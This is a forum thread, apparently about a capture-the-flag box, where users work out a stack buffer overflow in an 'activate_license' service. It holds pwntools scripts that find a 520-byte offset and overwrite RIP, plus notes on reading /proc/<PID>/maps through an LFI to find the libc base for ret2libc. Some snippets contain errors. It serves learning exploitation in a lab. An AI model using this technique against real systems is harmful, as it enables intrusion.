Posts: 18 Threads: 0 Joined: N/A Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it. Posts: 23 Threads: 0 Joined: N/A April 5, 2022 at 11:30 PM (April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it. You need to send the size in big endian 32bit before, read the php file Posts: 71 Threads: 0 Joined: N/A April 6, 2022 at 10:48 PM (April 5, 2022, 11:30 PM)mrfart Wrote: (April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
You need to send the size in big endian 32bit before, read the php file This is likely whats messing with me. I get BOF by sending 516 "A's" so do we actually need to send it separately at all?.... if so, what are we sending? Calc the size of the payload, send size then send "license" payload?
(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it. If you've got a copy of the ELF and using python + PWNTools: ./activate_license 1337
## Python
from pwn import *
r = remote('127.0.0.1',1337)
gdb.attach(r) # debug in gdb
That will pop a GDB window already attached, assuming the remote connection works. then you set your breaks and go. else if not pwntools, but plain python. ./activate_license 1337
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('127.0.0.1',1337))
gdb.attach(s) # debug in gdb
Posts: 23 Threads: 0 Joined: N/A April 6, 2022 at 11:14 PM (April 6, 2022, 10:48 PM)skyweasel Wrote: (April 5, 2022, 11:30 PM)mrfart Wrote: (April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
You need to send the size in big endian 32bit before, read the php file
This is likely whats messing with me.
I get BOF by sending 516 "A's" so do we actually need to send it separately at all?.... if so, what are we sending? Calc the size of the payload, send size then send "license" payload?
(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
If you've got a copy of the ELF and using python + PWNTools:
./activate_license 1337
## Python
from pwn import *
r = remote('127.0.0.1',1337)
gdb.attach(r) # debug in gdb
That will pop a GDB window already attached, assuming the remote connection works.
then you set your breaks and go.
else if not pwntools, but plain python.
./activate_license 1337
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('127.0.0.1',1337))
gdb.attach(s) # debug in gdb
I'm still working on this part but I could overwrite the RIP. If you pay attention to this lines in the activate_license.php: socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);
This is what is sent to the binary. It is packing the license size, you can see this reference here: https://www.w3schools.com/php/func_misc_pack.asp "N - unsigned long (always 32 bit, big endian byte order)" And sending the content of the file together. So how to find the offset? from pwn import *
io = remote('127.0.0.1', 1337)
offset = 800 # Don't know the offset yet, lets start with a big number
size = p32(offset, endian='big') # We need to pack as 32 bit big endian
payload = [
size,
cyclic(1000) # Create a 1000 characters pattern
]
payload = b"".join(payload)
io.send(payload)
io.interactive()
I set the license_size (the offset variable in the script) bigger than 512 bytes so the binary reads more than it should. Running this script you can get the 520 bytes of offset before the buffer overflow. pwndbg> x/xw $rsp
0x7fffffffdd18: 0x66616166
$ python2 -c 'from pwn import *; print cyclic_find(unhex("66616166")[::-1])'
520
What I did was, starting the binary using GDB and running this python script we can overwrite the RIP with " 0xd34dc0d3" for example: #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Usage: python3 poc.py [DEBUG]
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 64
offset = 800
size = p32(offset, endian='big')
payload = b''
payload += size
payload += b'A' * 520
payload += p64(0xd34dc0d3)
r = remote('localhost', 1337)
r.sendline(payload)
r.sendline()
From here we can set the RIP to any address we want, however, the addresses are all offsets so we need to leak some function or variable address to calculate the base address. And then we can use the leaked address with the offsets to point the RIP anywhere we want. I thought of trying a ret2libc, downloaded the libc used in the binary and now I'm stuck... :( Posts: 71 Threads: 0 Joined: N/A April 7, 2022 at 12:38 AM (April 6, 2022, 11:14 PM)mrfart Wrote: (April 6, 2022, 10:48 PM)skyweasel Wrote: (April 5, 2022, 11:30 PM)mrfart Wrote: (April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
You need to send the size in big endian 32bit before, read the php file
This is likely whats messing with me.
I get BOF by sending 516 "A's" so do we actually need to send it separately at all?.... if so, what are we sending? Calc the size of the payload, send size then send "license" payload?
(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
If you've got a copy of the ELF and using python + PWNTools:
./activate_license 1337
## Python
from pwn import *
r = remote('127.0.0.1',1337)
gdb.attach(r) # debug in gdb
That will pop a GDB window already attached, assuming the remote connection works.
then you set your breaks and go.
else if not pwntools, but plain python.
./activate_license 1337
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('127.0.0.1',1337))
gdb.attach(s) # debug in gdb
I'm still working on this part but I could overwrite the RIP.
If you pay attention to this lines in the activate_license.php:
socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);
This is what is sent to the binary. It is packing the license size, you can see this reference here: https://www.w3schools.com/php/func_misc_pack.asp
"N - unsigned long (always 32 bit, big endian byte order)"
And sending the content of the file together.
So how to find the offset?
from pwn import *
io = remote('127.0.0.1', 1337)
offset = 800 # Don't know the offset yet, lets start with a big number
size = p32(offset, endian='big') # We need to pack as 32 bit big endian
payload = [
size,
cyclic(1000) # Create a 1000 characters pattern
]
payload = b"".join(payload)
io.send(payload)
io.interactive()
I set the license_size (the offset variable in the script) bigger than 512 bytes so the binary reads more than it should.
Running this script you can get the 520 bytes of offset before the buffer overflow.
pwndbg> x/xw $rsp
0x7fffffffdd18: 0x66616166
$ python2 -c 'from pwn import *; print cyclic_find(unhex("66616166")[::-1])'
520
What I did was, starting the binary using GDB and running this python script we can overwrite the RIP with "0xd34dc0d3" for example:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Usage: python3 poc.py [DEBUG]
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 64
offset = 800
size = p32(offset, endian='big')
payload = b''
payload += size
payload += b'A' * 520
payload += p64(0xd34dc0d3)
r = remote('localhost', 1337)
r.sendline(payload)
r.sendline()
From here we can set the RIP to any address we want, however, the addresses are all offsets so we need to leak some function or variable address to calculate the base address. And then we can use the leaked address with the offsets to point the RIP anywhere we want.
I thought of trying a ret2libc, downloaded the libc used in the binary and now I'm stuck... :( Nice one, well we can actually get the base address of libc using the LFI, grabbing and analysing /proc/<PID>/maps I get:
<snip>
7f1f287d9000-7f1f287fe000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f287fe000-7f1f28949000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28949000-7f1f28993000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28993000-7f1f28994000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28994000-7f1f28997000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28997000-7f1f2899a000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
<snip>
Posts: 71 Threads: 0 Joined: N/A (April 7, 2022, 12:38 AM)skyweasel Wrote: (April 6, 2022, 11:14 PM)mrfart Wrote: (April 6, 2022, 10:48 PM)skyweasel Wrote: (April 5, 2022, 11:30 PM)mrfart Wrote: (April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
You need to send the size in big endian 32bit before, read the php file
This is likely whats messing with me.
I get BOF by sending 516 "A's" so do we actually need to send it separately at all?.... if so, what are we sending? Calc the size of the payload, send size then send "license" payload?
(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers how to get gdb to work with the binary? I just get bad address as soon as i try to send any data to the binary when its connected to gdb, so if its a bof i cant se it.
If you've got a copy of the ELF and using python + PWNTools:
./activate_license 1337
## Python
from pwn import *
r = remote('127.0.0.1',1337)
gdb.attach(r) # debug in gdb
That will pop a GDB window already attached, assuming the remote connection works.
then you set your breaks and go.
else if not pwntools, but plain python.
./activate_license 1337
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('127.0.0.1',1337))
gdb.attach(s) # debug in gdb
I'm still working on this part but I could overwrite the RIP.
If you pay attention to this lines in the activate_license.php:
socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);
This is what is sent to the binary. It is packing the license size, you can see this reference here: https://www.w3schools.com/php/func_misc_pack.asp
"N - unsigned long (always 32 bit, big endian byte order)"
And sending the content of the file together.
So how to find the offset?
from pwn import *
io = remote('127.0.0.1', 1337)
offset = 800 # Don't know the offset yet, lets start with a big number
size = p32(offset, endian='big') # We need to pack as 32 bit big endian
payload = [
size,
cyclic(1000) # Create a 1000 characters pattern
]
payload = b"".join(payload)
io.send(payload)
io.interactive()
I set the license_size (the offset variable in the script) bigger than 512 bytes so the binary reads more than it should.
Running this script you can get the 520 bytes of offset before the buffer overflow.
pwndbg> x/xw $rsp
0x7fffffffdd18: 0x66616166
$ python2 -c 'from pwn import *; print cyclic_find(unhex("66616166")[::-1])'
520
What I did was, starting the binary using GDB and running this python script we can overwrite the RIP with "0xd34dc0d3" for example:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Usage: python3 poc.py [DEBUG]
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 64
offset = 800
size = p32(offset, endian='big')
payload = b''
payload += size
payload += b'A' * 520
payload += p64(0xd34dc0d3)
r = remote('localhost', 1337)
r.sendline(payload)
r.sendline()
From here we can set the RIP to any address we want, however, the addresses are all offsets so we need to leak some function or variable address to calculate the base address. And then we can use the leaked address with the offsets to point the RIP anywhere we want.
I thought of trying a ret2libc, downloaded the libc used in the binary and now I'm stuck... :(
Nice one, well we can actually get the base address of libc using the LFI, grabbing and analysing /proc/<PID>/maps
I get:
<snip>
7f1f287d9000-7f1f287fe000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f287fe000-7f1f28949000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28949000-7f1f28993000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28993000-7f1f28994000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28994000-7f1f28997000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28997000-7f1f2899a000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
<snip>
Im having trouble getting that version of libc to work, did you manage to grab a copy and have it run? Posts: 32 Threads: 0 Joined: N/A The stack overflow vulnerability is quite simple, the difficulty part is how to build the ROPchain. Posts: 71 Threads: 0 Joined: N/A (April 7, 2022, 03:07 AM)F4nny Wrote: The stack overflow vulnerability is quite simple, the difficulty part is how to build the ROPchain. Agreed, the SOF is the easy bit. Care to share the targeted ROP steps? Cant even get a patched version working on my rig to match the libc version used on the box :/ Posts: 32 Threads: 0 Joined: N/A (April 7, 2022, 03:41 AM)skyweasel Wrote: (April 7, 2022, 03:07 AM)F4nny Wrote: The stack overflow vulnerability is quite simple, the difficulty part is how to build the ROPchain.
Agreed, the SOF is the easy bit.
Care to share the targeted ROP steps?
Cant even get a patched version working on my rig to match the libc version used on the box :/ Stuck there for a while XD Posts: 49 Threads: 0 Joined: N/A try to run some binary exploit where you can get root from that techique |
